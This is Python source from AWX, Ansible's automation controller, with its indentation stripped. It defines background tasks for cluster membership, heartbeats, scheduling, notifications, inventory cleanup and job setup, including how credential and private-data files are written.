from awx.main.queue import CallbackQueueDispatcher
from awx.main.isolated import manager as isolated_manager
from awx.main.dispatch.publish import task
from awx.main.dispatch import get_local_queuename, reaper
from awx.main.utils import (
update_scm_url,
ignore_inventory_computed_fields,
ignore_inventory_group_removal,
extract_ansible_vars,
schedule_task_manager,
get_awx_version,
deepmerge,
parse_yaml_or_json,
)
from awx.main.utils.execution_environments import get_default_execution_environment, get_default_pod_spec
from awx.main.utils.ansible import read_ansible_config
from awx.main.utils.external_logging import reconfigure_rsyslog
from awx.main.utils.safe_yaml import safe_dump, sanitize_jinja
from awx.main.utils.reload import stop_local_services
from awx.main.utils.pglock import advisory_lock
from awx.main.utils.handlers import SpecialInventoryHandler
from awx.main.consumers import emit_channel_notification
from awx.main import analytics
from awx.conf import settings_registry
from awx.conf.license import get_license
from awx.main.analytics.subsystem_metrics import Metrics
from rest_framework.exceptions import PermissionDenied
__all__ = [
'RunJob',
'RunSystemJob',
'RunProjectUpdate',
'RunInventoryUpdate',
'RunAdHocCommand',
'handle_work_error',
'handle_work_success',
'apply_cluster_membership_policies',
'update_inventory_computed_fields',
'update_host_smart_inventory_memberships',
'send_notifications',
'purge_old_stdout_files',
]
HIDDEN_PASSWORD = '**********'
OPENSSH_KEY_ERROR = u'''\
It looks like you're trying to use a private key in OpenSSH format, which \
isn't supported by the installed version of OpenSSH on this instance. \
Try upgrading OpenSSH or providing your private key in an different format. \
'''
logger = logging.getLogger('awx.main.tasks')
class InvalidVirtualenvError(Exception):
def __init__(self, message):
self.message = message
def dispatch_startup():
startup_logger = logging.getLogger('awx.main.tasks')
startup_logger.debug("Syncing Schedules")
for sch in Schedule.objects.all():
try:
sch.update_computed_fields()
except Exception:
logger.exception("Failed to rebuild schedule {}.".format(sch))
#
# When the dispatcher starts, if the instance cannot be found in the database,
# automatically register it. This is mostly useful for openshift-based
# deployments where:
#
# 2 Instances come online
# Instance B encounters a network blip, Instance A notices, and
# deprovisions it
# Instance B's connectivity is restored, the dispatcher starts, and it
# re-registers itself
#
# In traditional container-less deployments, instances don't get
# deprovisioned when they miss their heartbeat, so this code is mostly a
# no-op.
#
apply_cluster_membership_policies()
cluster_node_heartbeat()
if Instance.objects.me().is_controller():
awx_isolated_heartbeat()
Metrics().clear_values()
# Update Tower's rsyslog.conf file based on loggins settings in the db
reconfigure_rsyslog()
def inform_cluster_of_shutdown():
try:
this_inst = Instance.objects.get(hostname=settings.CLUSTER_HOST_ID)
this_inst.capacity = 0 # No thank you to new jobs while shut down
this_inst.save(update_fields=['capacity', 'modified'])
try:
reaper.reap(this_inst)
except Exception:
logger.exception('failed to reap jobs for {}'.format(this_inst.hostname))
logger.warning('Normal shutdown signal for instance {}, ' 'removed self from capacity pool.'.format(this_inst.hostname))
except Exception:
logger.exception('Encountered problem with normal shutdown signal.')
@task(queue=get_local_queuename)
def apply_cluster_membership_policies():
started_waiting = time.time()
with advisory_lock('cluster_policy_lock', wait=True):
lock_time = time.time() - started_waiting
if lock_time > 1.0:
to_log = logger.info
else:
to_log = logger.debug
to_log('Waited {} seconds to obtain lock name: cluster_policy_lock'.format(lock_time))
started_compute = time.time()
all_instances = list(Instance.objects.order_by('id'))
all_groups = list(InstanceGroup.objects.prefetch_related('instances'))
iso_hostnames = set([])
for ig in all_groups:
if ig.controller_id is not None:
iso_hostnames.update(ig.policy_instance_list)
considered_instances = [inst for inst in all_instances if inst.hostname not in iso_hostnames]
total_instances = len(considered_instances)
actual_groups = []
actual_instances = []
Group = namedtuple('Group', ['obj', 'instances', 'prior_instances'])
Node = namedtuple('Instance', ['obj', 'groups'])
# Process policy instance list first, these will represent manually managed memberships
instance_hostnames_map = {inst.hostname: inst for inst in all_instances}
for ig in all_groups:
group_actual = Group(obj=ig, instances=[], prior_instances=[instance.pk for instance in ig.instances.all()]) # obtained in prefetch
for hostname in ig.policy_instance_list:
if hostname not in instance_hostnames_map:
logger.info("Unknown instance {} in {} policy list".format(hostname, ig.name))
continue
inst = instance_hostnames_map[hostname]
group_actual.instances.append(inst.id)
# NOTE: arguable behavior: policy-list-group is not added to
# instance's group count for consideration in minimum-policy rules
if group_actual.instances:
logger.debug("Policy List, adding Instances {} to Group {}".format(group_actual.instances, ig.name))
if ig.controller_id is None:
actual_groups.append(group_actual)
else:
# For isolated groups, _only_ apply the policy_instance_list
# do not add to in-memory list, so minimum rules not applied
logger.debug('Committing instances to isolated group {}'.format(ig.name))
ig.instances.set(group_actual.instances)
# Process Instance minimum policies next, since it represents a concrete lower bound to the
# number of instances to make available to instance groups
actual_instances = [Node(obj=i, groups=[]) for i in considered_instances if i.managed_by_policy]
logger.debug("Total non-isolated instances:{} available for policy: {}".format(total_instances, len(actual_instances)))
for g in sorted(actual_groups, key=lambda x: len(x.instances)):
policy_min_added = []
for i in sorted(actual_instances, key=lambda x: len(x.groups)):
if len(g.instances) >= g.obj.policy_instance_minimum:
break
if i.obj.id in g.instances:
# If the instance is already _in_ the group, it was
# applied earlier via the policy list
continue
g.instances.append(i.obj.id)
i.groups.append(g.obj.id)
policy_min_added.append(i.obj.id)
if policy_min_added:
logger.debug("Policy minimum, adding Instances {} to Group {}".format(policy_min_added, g.obj.name))
# Finally, process instance policy percentages
for g in sorted(actual_groups, key=lambda x: len(x.instances)):
policy_per_added = []
for i in sorted(actual_instances, key=lambda x: len(x.groups)):
if i.obj.id in g.instances:
# If the instance is already _in_ the group, it was
# applied earlier via a minimum policy or policy list
continue
if 100 * float(len(g.instances)) / len(actual_instances) >= g.obj.policy_instance_percentage:
break
g.instances.append(i.obj.id)
i.groups.append(g.obj.id)
policy_per_added.append(i.obj.id)
if policy_per_added:
logger.debug("Policy percentage, adding Instances {} to Group {}".format(policy_per_added, g.obj.name))
# Determine if any changes need to be made
needs_change = False
for g in actual_groups:
if set(g.instances) != set(g.prior_instances):
needs_change = True
break
if not needs_change:
logger.debug('Cluster policy no-op finished in {} seconds'.format(time.time() - started_compute))
return
# On a differential basis, apply instances to non-isolated groups
with transaction.atomic():
for g in actual_groups:
if g.obj.is_container_group:
logger.debug('Skipping containerized group {} for policy calculation'.format(g.obj.name))
continue
instances_to_add = set(g.instances) - set(g.prior_instances)
instances_to_remove = set(g.prior_instances) - set(g.instances)
if instances_to_add:
logger.debug('Adding instances {} to group {}'.format(list(instances_to_add), g.obj.name))
g.obj.instances.add(*instances_to_add)
if instances_to_remove:
logger.debug('Removing instances {} from group {}'.format(list(instances_to_remove), g.obj.name))
g.obj.instances.remove(*instances_to_remove)
logger.debug('Cluster policy computation finished in {} seconds'.format(time.time() - started_compute))
@task(queue='tower_broadcast_all')
def handle_setting_changes(setting_keys):
orig_len = len(setting_keys)
for i in range(orig_len):
for dependent_key in settings_registry.get_dependent_settings(setting_keys[i]):
setting_keys.append(dependent_key)
cache_keys = set(setting_keys)
logger.debug('cache delete_many(%r)', cache_keys)
cache.delete_many(cache_keys)
if any([setting.startswith('LOG_AGGREGATOR') for setting in setting_keys]):
reconfigure_rsyslog()
@task(queue='tower_broadcast_all')
def delete_project_files(project_path):
# TODO: possibly implement some retry logic
lock_file = project_path + '.lock'
if os.path.exists(project_path):
try:
shutil.rmtree(project_path)
logger.debug('Success removing project files {}'.format(project_path))
except Exception:
logger.exception('Could not remove project directory {}'.format(project_path))
if os.path.exists(lock_file):
try:
os.remove(lock_file)
logger.debug('Success removing {}'.format(lock_file))
except Exception:
logger.exception('Could not remove lock file {}'.format(lock_file))
@task(queue='tower_broadcast_all')
def profile_sql(threshold=1, minutes=1):
if threshold <= 0:
cache.delete('awx-profile-sql-threshold')
logger.error('SQL PROFILING DISABLED')
else:
cache.set('awx-profile-sql-threshold', threshold, timeout=minutes * 60)
logger.error('SQL QUERIES >={}s ENABLED FOR {} MINUTE(S)'.format(threshold, minutes))
@task(queue=get_local_queuename)
def send_notifications(notification_list, job_id=None):
if not isinstance(notification_list, list):
raise TypeError("notification_list should be of type list")
if job_id is not None:
job_actual = UnifiedJob.objects.get(id=job_id)
notifications = Notification.objects.filter(id__in=notification_list)
if job_id is not None:
job_actual.notifications.add(*notifications)
for notification in notifications:
update_fields = ['status', 'notifications_sent']
try:
sent = notification.notification_template.send(notification.subject, notification.body)
notification.status = "successful"
notification.notifications_sent = sent
if job_id is not None:
job_actual.log_lifecycle("notifications_sent")
except Exception as e:
logger.exception("Send Notification Failed {}".format(e))
notification.status = "failed"
notification.error = smart_str(e)
update_fields.append('error')
finally:
try:
notification.save(update_fields=update_fields)
except Exception:
logger.exception('Error saving notification {} result.'.format(notification.id))
@task(queue=get_local_queuename)
def gather_analytics():
from awx.conf.models import Setting
from rest_framework.fields import DateTimeField
last_gather = Setting.objects.filter(key='AUTOMATION_ANALYTICS_LAST_GATHER').first()
last_time = DateTimeField().to_internal_value(last_gather.value) if last_gather else None
gather_time = now()
if not last_time or ((gather_time - last_time).total_seconds() > settings.AUTOMATION_ANALYTICS_GATHER_INTERVAL):
analytics.gather()
@task(queue=get_local_queuename)
def purge_old_stdout_files():
nowtime = time.time()
for f in os.listdir(settings.JOBOUTPUT_ROOT):
if os.path.getctime(os.path.join(settings.JOBOUTPUT_ROOT, f)) < nowtime - settings.LOCAL_STDOUT_EXPIRE_TIME:
os.unlink(os.path.join(settings.JOBOUTPUT_ROOT, f))
logger.debug("Removing {}".format(os.path.join(settings.JOBOUTPUT_ROOT, f)))
@task(queue=get_local_queuename)
def cleanup_execution_environment_images():
if settings.IS_K8S:
return
process = subprocess.run('podman images --filter="dangling=true" --format json'.split(" "), capture_output=True)
if process.returncode != 0:
logger.debug("Cleanup execution environment images: could not get list of images")
return
if len(process.stdout) > 0:
images_system = json.loads(process.stdout)
for e in images_system:
image_name = e["Id"]
logger.debug(f"Cleanup execution environment images: deleting {image_name}")
process = subprocess.run(['podman', 'rmi', image_name, '-f'], stdout=subprocess.DEVNULL)
if process.returncode != 0:
logger.debug(f"Failed to delete image {image_name}")
@task(queue=get_local_queuename)
def cluster_node_heartbeat():
logger.debug("Cluster node heartbeat task.")
nowtime = now()
instance_list = list(Instance.objects.all_non_isolated())
this_inst = None
lost_instances = []
(changed, instance) = Instance.objects.get_or_register()
if changed:
logger.info("Registered tower node '{}'".format(instance.hostname))
for inst in list(instance_list):
if inst.hostname == settings.CLUSTER_HOST_ID:
this_inst = inst
instance_list.remove(inst)
elif inst.is_lost(ref_time=nowtime):
lost_instances.append(inst)
instance_list.remove(inst)
if this_inst:
startup_event = this_inst.is_lost(ref_time=nowtime)
this_inst.refresh_capacity()
if startup_event:
logger.warning('Rejoining the cluster as instance {}.'.format(this_inst.hostname))
return
else:
raise RuntimeError("Cluster Host Not Found: {}".format(settings.CLUSTER_HOST_ID))
# IFF any node has a greater version than we do, then we'll shutdown services
for other_inst in instance_list:
if other_inst.version == "":
continue
if Version(other_inst.version.split('-', 1)[0]) > Version(awx_application_version.split('-', 1)[0]) and not settings.DEBUG:
logger.error(
"Host {} reports version {}, but this node {} is at {}, shutting down".format(
other_inst.hostname, other_inst.version, this_inst.hostname, this_inst.version
)
)
# Shutdown signal will set the capacity to zero to ensure no Jobs get added to this instance.
# The heartbeat task will reset the capacity to the system capacity after upgrade.
stop_local_services(communicate=False)
raise RuntimeError("Shutting down.")
for other_inst in lost_instances:
try:
reaper.reap(other_inst)
except Exception:
logger.exception('failed to reap jobs for {}'.format(other_inst.hostname))
try:
# Capacity could already be 0 because:
# * It's a new node and it never had a heartbeat
# * It was set to 0 by another tower node running this method
# * It was set to 0 by this node, but auto deprovisioning is off
#
# If auto deprovisining is on, don't bother setting the capacity to 0
# since we will delete the node anyway.
if other_inst.capacity != 0 and not settings.AWX_AUTO_DEPROVISION_INSTANCES:
other_inst.capacity = 0
other_inst.save(update_fields=['capacity'])
logger.error("Host {} last checked in at {}, marked as lost.".format(other_inst.hostname, other_inst.modified))
elif settings.AWX_AUTO_DEPROVISION_INSTANCES:
deprovision_hostname = other_inst.hostname
other_inst.delete()
logger.info("Host {} Automatically Deprovisioned.".format(deprovision_hostname))
except DatabaseError as e:
if 'did not affect any rows' in str(e):
logger.debug('Another instance has marked {} as lost'.format(other_inst.hostname))
else:
logger.exception('Error marking {} as lost'.format(other_inst.hostname))
@task(queue=get_local_queuename)
def awx_k8s_reaper():
if not settings.RECEPTOR_RELEASE_WORK:
return
from awx.main.scheduler.kubernetes import PodManager # prevent circular import
for group in InstanceGroup.objects.filter(is_container_group=True).iterator():
logger.debug("Checking for orphaned k8s pods for {}.".format(group))
pods = PodManager.list_active_jobs(group)
for job in UnifiedJob.objects.filter(pk__in=pods.keys()).exclude(status__in=ACTIVE_STATES):
logger.debug('{} is no longer active, reaping orphaned k8s pod'.format(job.log_format))
try:
pm = PodManager(job)
pm.kube_api.delete_namespaced_pod(name=pods[job.id], namespace=pm.namespace, _request_timeout=settings.AWX_CONTAINER_GROUP_K8S_API_TIMEOUT)
except Exception:
logger.exception("Failed to delete orphaned pod {} from {}".format(job.log_format, group))
@task(queue=get_local_queuename)
def awx_isolated_heartbeat():
local_hostname = settings.CLUSTER_HOST_ID
logger.debug("Controlling node checking for any isolated management tasks.")
poll_interval = settings.AWX_ISOLATED_PERIODIC_CHECK
# Get isolated instances not checked since poll interval - some buffer
nowtime = now()
accept_before = nowtime - timedelta(seconds=(poll_interval - 10))
isolated_instance_qs = Instance.objects.filter(
rampart_groups__controller__instances__hostname=local_hostname,
)
isolated_instance_qs = isolated_instance_qs.filter(last_isolated_check__lt=accept_before) | isolated_instance_qs.filter(last_isolated_check=None)
# Fast pass of isolated instances, claiming the nodes to update
with transaction.atomic():
for isolated_instance in isolated_instance_qs:
isolated_instance.last_isolated_check = nowtime
# Prevent modified time from being changed, as in normal heartbeat
isolated_instance.save(update_fields=['last_isolated_check'])
# Slow pass looping over isolated IGs and their isolated instances
if len(isolated_instance_qs) > 0:
logger.debug("Managing isolated instances {}.".format(','.join([inst.hostname for inst in isolated_instance_qs])))
isolated_manager.IsolatedManager(CallbackQueueDispatcher.dispatch).health_check(isolated_instance_qs)
@task(queue=get_local_queuename)
def awx_periodic_scheduler():
with advisory_lock('awx_periodic_scheduler_lock', wait=False) as acquired:
if acquired is False:
logger.debug("Not running periodic scheduler, another task holds lock")
return
logger.debug("Starting periodic scheduler")
run_now = now()
state = TowerScheduleState.get_solo()
last_run = state.schedule_last_run
logger.debug("Last scheduler run was: %s", last_run)
state.schedule_last_run = run_now
state.save()
old_schedules = Schedule.objects.enabled().before(last_run)
for schedule in old_schedules:
schedule.update_computed_fields()
schedules = Schedule.objects.enabled().between(last_run, run_now)
invalid_license = False
try:
access_registry[Job](None).check_license(quiet=True)
except PermissionDenied as e:
invalid_license = e
for schedule in schedules:
template = schedule.unified_job_template
schedule.update_computed_fields() # To update next_run timestamp.
if template.cache_timeout_blocked:
logger.warn("Cache timeout is in the future, bypassing schedule for template %s" % str(template.id))
continue
try:
job_kwargs = schedule.get_job_kwargs()
new_unified_job = schedule.unified_job_template.create_unified_job(**job_kwargs)
logger.debug('Spawned {} from schedule {}-{}.'.format(new_unified_job.log_format, schedule.name, schedule.pk))
if invalid_license:
new_unified_job.status = 'failed'
new_unified_job.job_explanation = str(invalid_license)
new_unified_job.save(update_fields=['status', 'job_explanation'])
new_unified_job.websocket_emit_status("failed")
raise invalid_license
can_start = new_unified_job.signal_start()
except Exception:
logger.exception('Error spawning scheduled job.')
continue
if not can_start:
new_unified_job.status = 'failed'
new_unified_job.job_explanation = gettext_noop(
"Scheduled job could not start because it \
was not in the right state or required manual credentials"
)
new_unified_job.save(update_fields=['status', 'job_explanation'])
new_unified_job.websocket_emit_status("failed")
emit_channel_notification('schedules-changed', dict(id=schedule.id, group_name="schedules"))
state.save()
@task(queue=get_local_queuename)
def handle_work_success(task_actual):
try:
instance = UnifiedJob.get_instance_by_type(task_actual['type'], task_actual['id'])
except ObjectDoesNotExist:
logger.warning('Missing {} `{}` in success callback.'.format(task_actual['type'], task_actual['id']))
return
if not instance:
return
schedule_task_manager()
@task(queue=get_local_queuename)
def handle_work_error(task_id, *args, **kwargs):
subtasks = kwargs.get('subtasks', None)
logger.debug('Executing error task id %s, subtasks: %s' % (task_id, str(subtasks)))
first_instance = None
first_instance_type = ''
if subtasks is not None:
for each_task in subtasks:
try:
instance = UnifiedJob.get_instance_by_type(each_task['type'], each_task['id'])
if not instance:
# Unknown task type
logger.warn("Unknown task type: {}".format(each_task['type']))
continue
except ObjectDoesNotExist:
logger.warning('Missing {} `{}` in error callback.'.format(each_task['type'], each_task['id']))
continue
if first_instance is None:
first_instance = instance
first_instance_type = each_task['type']
if instance.celery_task_id != task_id and not instance.cancel_flag and not instance.status == 'successful':
instance.status = 'failed'
instance.failed = True
if not instance.job_explanation:
instance.job_explanation = 'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}' % (
first_instance_type,
first_instance.name,
first_instance.id,
)
instance.save()
instance.websocket_emit_status("failed")
# We only send 1 job complete message since all the job completion message
# handling does is trigger the scheduler. If we extend the functionality of
# what the job complete message handler does then we may want to send a
# completion event for each job here.
if first_instance:
schedule_task_manager()
pass
@task(queue=get_local_queuename)
def handle_success_and_failure_notifications(job_id):
uj = UnifiedJob.objects.get(pk=job_id)
retries = 0
while retries < 5:
if uj.finished:
uj.send_notification_templates('succeeded' if uj.status == 'successful' else 'failed')
return
else:
# wait a few seconds to avoid a race where the
# events are persisted _before_ the UJ.status
# changes from running -> successful
retries += 1
time.sleep(1)
uj = UnifiedJob.objects.get(pk=job_id)
logger.warn(f"Failed to even try to send notifications for job '{uj}' due to job not being in finished state.")
@task(queue=get_local_queuename)
def update_inventory_computed_fields(inventory_id):
"""
Signal handler and wrapper around inventory.update_computed_fields to
prevent unnecessary recursive calls.
"""
i = Inventory.objects.filter(id=inventory_id)
if not i.exists():
logger.error("Update Inventory Computed Fields failed due to missing inventory: " + str(inventory_id))
return
i = i[0]
try:
i.update_computed_fields()
except DatabaseError as e:
if 'did not affect any rows' in str(e):
logger.debug('Exiting duplicate update_inventory_computed_fields task.')
return
raise
def update_smart_memberships_for_inventory(smart_inventory):
current = set(SmartInventoryMembership.objects.filter(inventory=smart_inventory).values_list('host_id', flat=True))
new = set(smart_inventory.hosts.values_list('id', flat=True))
additions = new - current
removals = current - new
if additions or removals:
with transaction.atomic():
if removals:
SmartInventoryMembership.objects.filter(inventory=smart_inventory, host_id__in=removals).delete()
if additions:
add_for_inventory = [SmartInventoryMembership(inventory_id=smart_inventory.id, host_id=host_id) for host_id in additions]
SmartInventoryMembership.objects.bulk_create(add_for_inventory, ignore_conflicts=True)
logger.debug(
'Smart host membership cached for {}, {} additions, {} removals, {} total count.'.format(
smart_inventory.pk, len(additions), len(removals), len(new)
)
)
return True # changed
return False
@task(queue=get_local_queuename)
def update_host_smart_inventory_memberships():
smart_inventories = Inventory.objects.filter(kind='smart', host_filter__isnull=False, pending_deletion=False)
changed_inventories = set([])
for smart_inventory in smart_inventories:
try:
changed = update_smart_memberships_for_inventory(smart_inventory)
if changed:
changed_inventories.add(smart_inventory)
except IntegrityError:
logger.exception('Failed to update smart inventory memberships for {}'.format(smart_inventory.pk))
# Update computed fields for changed inventories outside atomic action
for smart_inventory in changed_inventories:
smart_inventory.update_computed_fields()
@task(queue=get_local_queuename)
def migrate_legacy_event_data(tblname):
#
# NOTE: this function is not actually in use anymore,
# but has been intentionally kept for historical purposes,
# and to serve as an illustration if we ever need to perform
# bulk modification/migration of event data in the future.
#
if 'event' not in tblname:
return
with advisory_lock(f'bigint_migration_{tblname}', wait=False) as acquired:
if acquired is False:
return
chunk = settings.JOB_EVENT_MIGRATION_CHUNK_SIZE
def _remaining():
try:
cursor.execute(f'SELECT MAX(id) FROM _old_{tblname};')
return cursor.fetchone()[0]
except ProgrammingError:
# the table is gone (migration is unnecessary)
return None
with connection.cursor() as cursor:
total_rows = _remaining()
while total_rows:
with transaction.atomic():
cursor.execute(f'INSERT INTO {tblname} SELECT * FROM _old_{tblname} ORDER BY id DESC LIMIT {chunk} RETURNING id;')
last_insert_pk = cursor.fetchone()
if last_insert_pk is None:
# this means that the SELECT from the old table was
# empty, and there was nothing to insert (so we're done)
break
last_insert_pk = last_insert_pk[0]
cursor.execute(f'DELETE FROM _old_{tblname} WHERE id IN (SELECT id FROM _old_{tblname} ORDER BY id DESC LIMIT {chunk});')
logger.warn(f'migrated int -> bigint rows to {tblname} from _old_{tblname}; # ({last_insert_pk} rows remaining)')
if _remaining() is None:
cursor.execute(f'DROP TABLE IF EXISTS _old_{tblname}')
logger.warn(f'{tblname} primary key migration to bigint has finished')
@task(queue=get_local_queuename)
def delete_inventory(inventory_id, user_id, retries=5):
# Delete inventory as user
if user_id is None:
user = None
else:
try:
user = User.objects.get(id=user_id)
except Exception:
user = None
with ignore_inventory_computed_fields(), ignore_inventory_group_removal(), impersonate(user):
try:
i = Inventory.objects.get(id=inventory_id)
for host in i.hosts.iterator():
host.job_events_as_primary_host.update(host=None)
i.delete()
emit_channel_notification('inventories-status_changed', {'group_name': 'inventories', 'inventory_id': inventory_id, 'status': 'deleted'})
logger.debug('Deleted inventory {} as user {}.'.format(inventory_id, user_id))
except Inventory.DoesNotExist:
logger.exception("Delete Inventory failed due to missing inventory: " + str(inventory_id))
return
except DatabaseError:
logger.exception('Database error deleting inventory {}, but will retry.'.format(inventory_id))
if retries > 0:
time.sleep(10)
delete_inventory(inventory_id, user_id, retries=retries - 1)
def with_path_cleanup(f):
@functools.wraps(f)
def _wrapped(self, *args, **kwargs):
try:
return f(self, *args, **kwargs)
finally:
for p in self.cleanup_paths:
try:
if os.path.isdir(p):
shutil.rmtree(p, ignore_errors=True)
elif os.path.exists(p):
os.remove(p)
except OSError:
logger.exception("Failed to remove tmp file: {}".format(p))
self.cleanup_paths = []
return _wrapped
class BaseTask(object):
model = None
event_model = None
abstract = True
def __init__(self):
self.cleanup_paths = []
self.parent_workflow_job_id = None
self.host_map = {}
self.guid = GuidMiddleware.get_guid()
def update_model(self, pk, _attempt=0, **updates):
"""Reload the model instance from the database and update the
given fields.
"""
try:
with transaction.atomic():
# Retrieve the model instance.
instance = self.model.objects.get(pk=pk)
# Update the appropriate fields and save the model
# instance, then return the new instance.
if updates:
update_fields = ['modified']
for field, value in updates.items():
setattr(instance, field, value)
update_fields.append(field)
if field == 'status':
update_fields.append('failed')
instance.save(update_fields=update_fields)
return instance
except DatabaseError as e:
# Log out the error to the debug logger.
logger.debug('Database error updating %s, retrying in 5 ' 'seconds (retry #%d): %s', self.model._meta.object_name, _attempt + 1, e)
# Attempt to retry the update, assuming we haven't already
# tried too many times.
if _attempt < 5:
time.sleep(5)
return self.update_model(pk, _attempt=_attempt + 1, **updates)
else:
logger.error('Failed to update %s after %d retries.', self.model._meta.object_name, _attempt)
def get_path_to(self, *args):
"""
Return absolute path relative to this file.
"""
return os.path.abspath(os.path.join(os.path.dirname(__file__), *args))
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
if instance.execution_environment_id is None:
from awx.main.signals import disable_activity_stream
with disable_activity_stream():
self.instance = instance = self.update_model(instance.pk, execution_environment=instance.resolve_execution_environment())
image = instance.execution_environment.image
params = {
"container_image": image,
"process_isolation": True,
"container_options": ['--user=root'],
}
if instance.execution_environment.credential:
cred = instance.execution_environment.credential
if cred.has_inputs(field_names=('host', 'username', 'password')):
path = os.path.split(private_data_dir)[0]
with open(path + '/auth.json', 'w') as authfile:
host = cred.get_input('host')
username = cred.get_input('username')
password = cred.get_input('password')
token = "{}:{}".format(username, password)
auth_data = {'auths': {host: {'auth': b64encode(token.encode('ascii')).decode()}}}
authfile.write(json.dumps(auth_data, indent=4))
authfile.close()
os.chmod(authfile.name, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
params["container_options"].append(f'--authfile={authfile.name}')
else:
raise RuntimeError('Please recheck that your host, username, and password fields are all filled.')
pull = instance.execution_environment.pull
if pull:
params['container_options'].append(f'--pull={pull}')
if settings.AWX_ISOLATION_SHOW_PATHS:
params['container_volume_mounts'] = []
for this_path in settings.AWX_ISOLATION_SHOW_PATHS:
params['container_volume_mounts'].append(f'{this_path}:{this_path}:Z')
return params
def build_private_data(self, instance, private_data_dir):
"""
Return SSH private key data (only if stored in DB as ssh_key_data).
Return structure is a dict of the form:
"""
def build_private_data_dir(self, instance):
"""
Create a temporary directory for job-related files.
"""
pdd_wrapper_path = tempfile.mkdtemp(prefix=f'pdd_wrapper_{instance.pk}_', dir=settings.AWX_ISOLATION_BASE_PATH)
os.chmod(pdd_wrapper_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
if settings.AWX_CLEANUP_PATHS:
self.cleanup_paths.append(pdd_wrapper_path)
path = tempfile.mkdtemp(prefix='awx_%s_' % instance.pk, dir=pdd_wrapper_path)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
runner_project_folder = os.path.join(path, 'project')
if not os.path.exists(runner_project_folder):
# Ansible Runner requires that this directory exists.
# Specifically, when using process isolation
os.mkdir(runner_project_folder)
return path
def build_private_data_files(self, instance, private_data_dir):
"""
Creates temporary files containing the private data.
Returns a dictionary i.e.,
{
'credentials': {
<awx.main.models.Credential>: '/path/to/decrypted/data',
<awx.main.models.Credential>: '/path/to/decrypted/data',
...
},
'certificates': {
<awx.main.models.Credential>: /path/to/signed/ssh/certificate,
<awx.main.models.Credential>: /path/to/signed/ssh/certificate,
...
}
}
"""
private_data = self.build_private_data(instance, private_data_dir)
private_data_files = {'credentials': {}}
if private_data is not None:
for credential, data in private_data.get('credentials', {}).items():
# OpenSSH formatted keys must have a trailing newline to be
# accepted by ssh-add.
if 'OPENSSH PRIVATE KEY' in data and not data.endswith('\n'):
data += '\n'
# For credentials used with ssh-add, write to a named pipe which
# will be read then closed, instead of leaving the SSH key on disk.
if credential and credential.credential_type.namespace in ('ssh', 'scm'):
try:
os.mkdir(os.path.join(private_data_dir, 'env'))
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(private_data_dir, 'env', 'ssh_key')
ansible_runner.utils.open_fifo_write(path, data.encode())
private_data_files['credentials']['ssh'] = path
# Ansible network modules do not yet support ssh-agent.
# Instead, ssh private key file is explicitly passed via an
# env variable.
else:
handle, path = tempfile.mkstemp(dir=private_data_dir)
f = os.fdopen(handle, 'w')
f.write(data)
f.close()
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
private_data_files['credentials'][credential] = path
for credential, data in private_data.get('certificates', {}).items():
artifact_dir = os.path.join(private_data_dir, 'artifacts', str(self.instance.id))
if not os.path.exists(artifact_dir):
os.makedirs(artifact_dir, mode=0o700)
path = os.path.join(artifact_dir, 'ssh_key_data-cert.pub')
with open(path, 'w') as f:
f.write(data)
f.close()
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
return private_data_files
def build_passwords(self, instance, runtime_passwords):
"""
Build a dictionary of passwords for responding to prompts.
"""
return {
'yes': 'yes',
'no': 'no',
'': '',
}
def build_extra_vars_file(self, instance, private_data_dir):
"""
Build ansible yaml file filled with extra vars to be passed via -e@file.yml
"""
def build_params_resource_profiling(self, instance, private_data_dir):
resource_profiling_params = {}
if self.should_use_resource_profiling(instance):
cpu_poll_interval = settings.AWX_RESOURCE_PROFILING_CPU_POLL_INTERVAL
mem_poll_interval = settings.AWX_RESOURCE_PROFILING_MEMORY_POLL_INTERVAL
pid_poll_interval = settings.AWX_RESOURCE_PROFILING_PID_POLL_INTERVAL
results_dir = os.path.join(private_data_dir, 'artifacts/playbook_profiling')
if not os.path.isdir(results_dir):
os.makedirs(results_dir, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
# FIXME: develop some better means of referencing paths inside containers
container_results_dir = os.path.join('/runner', 'artifacts/playbook_profiling')
logger.debug(
'Collected the following resource profiling intervals: cpu: {} mem: {} pid: {}'.format(cpu_poll_interval, mem_poll_interval, pid_poll_interval)
)
resource_profiling_params.update(
{
'resource_profiling': True,
'resource_profiling_base_cgroup': 'ansible-runner',
'resource_profiling_cpu_poll_interval': cpu_poll_interval,
'resource_profiling_memory_poll_interval': mem_poll_interval,
'resource_profiling_pid_poll_interval': pid_poll_interval,
'resource_profiling_results_dir': container_results_dir,
}
)
return resource_profiling_params
def _write_extra_vars_file(self, private_data_dir, vars, safe_dict={}):
env_path = os.path.join(private_data_dir, 'env')
try:
os.mkdir(env_path, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(env_path, 'extravars')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
if settings.ALLOW_JINJA_IN_EXTRA_VARS == 'always':
f.write(yaml.safe_dump(vars))
else:
f.write(safe_dump(vars, safe_dict))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def add_awx_venv(self, env):
env['VIRTUAL_ENV'] = settings.AWX_VENV_PATH
if 'PATH' in env:
env['PATH'] = os.path.join(settings.AWX_VENV_PATH, "bin") + ":" + env['PATH']
else:
env['PATH'] = os.path.join(settings.AWX_VENV_PATH, "bin")
def build_env(self, instance, private_data_dir, isolated, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = {}
# Add ANSIBLE_* settings to the subprocess environment.
for attr in dir(settings):
if attr == attr.upper() and attr.startswith('ANSIBLE_'):
env[attr] = str(getattr(settings, attr))
# Also set environment variables configured in AWX_TASK_ENV setting.
for key, value in settings.AWX_TASK_ENV.items():
env[key] = str(value)
env['AWX_PRIVATE_DATA_DIR'] = private_data_dir
return env
def should_use_resource_profiling(self, job):
"""
Return whether this task should use resource profiling
"""
return False
def build_inventory(self, instance, private_data_dir):
script_params = dict(hostvars=True, towervars=True)
